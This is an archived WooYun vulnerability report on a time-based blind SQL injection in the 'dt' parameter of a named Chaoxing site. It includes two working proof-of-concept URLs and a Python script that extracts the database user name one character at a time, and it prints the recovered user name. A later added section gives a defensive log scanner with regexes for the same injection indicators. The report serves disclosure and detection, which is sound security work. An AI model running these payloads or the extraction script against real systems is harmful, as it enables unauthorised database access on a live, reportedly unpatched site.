WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online ------------------------ http://drop.zone.ci/
2015-12-07: Details reported to the vendor; awaiting the vendor's response.
2015-12-12: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
RT (as the title says)
Site: sy.chaoxing.com
poc 1: http://sy.chaoxing.com/nfavs/searchByKey.jspx?linkName=&cataid=01&cataName经典理论&dt=95 ;if len(user)=8 WAITFOR DELAY '0:0:5' ;--
poc 2: http://sy.chaoxing.com/nfavs/searchByKey.jspx?linkName=&cataid=01&cataName经典理论&dt=95 ;if user like '________' WAITFOR DELAY '0:0:5' ;--
Both are time-based blind injections through the dt parameter: the response is delayed by five seconds only when the injected condition is true, so poc 1 confirms that the database user name is 8 characters long and poc 2 tests it against a LIKE pattern (the script fills that pattern in one character at a time).
Database user: user='kyD_user'
I also wrote a script:
# encoding=utf-8
import string
import sys
import time

import requests

# Character set to probe: lowercase letters, digits, uppercase letters and a few symbols.
payloads = list(string.ascii_lowercase) + [str(i) for i in range(10)]
payloads.extend(string.ascii_uppercase)
payloads += ['@', '.', '_']

print('[%s] Start to retrieve mssql user' % time.strftime('%H:%M:%S', time.localtime()))

LENGTH = 8   # user name length, confirmed by poc 1 (len(user)=8)
result = ''  # characters recovered so far

while len(result) < LENGTH:
    found = False
    for payload in payloads:
        # Known prefix, one guessed character, and '_' wildcards for the remaining positions.
        likeholder = result + payload + '_' * (LENGTH - 1 - len(result))
        url = ("http://sy.chaoxing.com/nfavs/searchByKey.jspx?linkName=&cataid=01&cataName经典理论&dt=95 "
               ";if user like '" + likeholder + "' WAITFOR DELAY '0:0:5' ;--")
        timeout_count = 0
        for _ in range(2):  # 2 times to confirm
            try:
                requests.get(url, timeout=4)
                print('.', end='', flush=True)
                break  # answered within 4 s, so the guess is wrong
            except Exception:
                timeout_count += 1
                time.sleep(5)  # wait for the DB server to recover from the last query
        if timeout_count == 2:
            result += payload
            found = True
            print('\n[In progress] now user is %s' % result)
            break
    if not found:
        print('\nNo candidate matched at position %d; stopping with: %s' % (len(result) + 1, result))
        sys.exit(1)

print('\nFinally, mssql user is', result)
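As an added, defender-side example that is not part of the original report: a small Python 3 scanner that pulls the request target out of access-log lines and flags query parameters carrying the time-based blind MSSQL injection indicators seen in the PoC above (WAITFOR DELAY, a stacked ;if, a LIKE pattern padded with underscores, len(user)). The sample log lines, indicator labels and regexes are constructed here for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit
# Request line of a combined-format access log: method, target, protocol.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Indicators of time-based blind MSSQL injection as used in the PoC above.
# The labels and regexes are constructed here, not part of the original report.
INDICATORS = [
    ("waitfor_delay", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("stacked_if",    re.compile(r";\s*if\b", re.I)),
    ("like_wildcard", re.compile(r"\blike\s+'[^']*_{2,}[^']*'", re.I)),
    ("len_user",      re.compile(r"\blen\s*\(\s*user\s*\)", re.I)),
]

def parse_query(query):
    """Split a raw query string on '&' and percent-decode names and values.
    Hand-rolled so a literal ';' inside a value (the PoC's statement separator)
    is never treated as a pair separator, and 'name' without '=' yields (name, '')."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def scan_query(query):
    """Return [(param, [labels])] for each parameter whose decoded value hits an indicator."""
    hits = []
    for name, value in parse_query(query):
        labels = [label for label, rx in INDICATORS if rx.search(value)]
        if labels:
            hits.append((name, labels))
    return hits

def scan_log_line(line):
    """Pull the request target out of one access-log line and scan its query string."""
    m = REQUEST_RE.search(line)
    return scan_query(urlsplit(m.group(1)).query) if m else []

# Constructed sample lines modelled on the PoC URLs, percent-encoded as a client sends them.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Dec/2015:10:12:01 +0800] "GET /nfavs/searchByKey.jspx?linkName=&cataid=01&dt=95 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [07/Dec/2015:10:12:07 +0800] "GET /nfavs/searchByKey.jspx?linkName=&cataid=01&dt=95%20;if%20len(user)=8%20WAITFOR%20DELAY%20%270:0:5%27%20;-- HTTP/1.1" 200 5120',
    '10.0.0.5 - - [07/Dec/2015:10:12:13 +0800] "GET /nfavs/searchByKey.jspx?linkName=&cataid=01&dt=95%20;if%20user%20like%20%27k_______%27%20WAITFOR%20DELAY%20%270:0:5%27%20;-- HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_log_line(line))
```

A run of these probes shows up as one client issuing many requests to the same endpoint with a non-numeric dt and response times clustering around the five-second delay, which is the pattern to alert on.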
Severity: No impact (vendor ignored)
Ignored at: 2015-12-12 10:42
Vulnerability Rank: 4 (WooYun rating)
None yet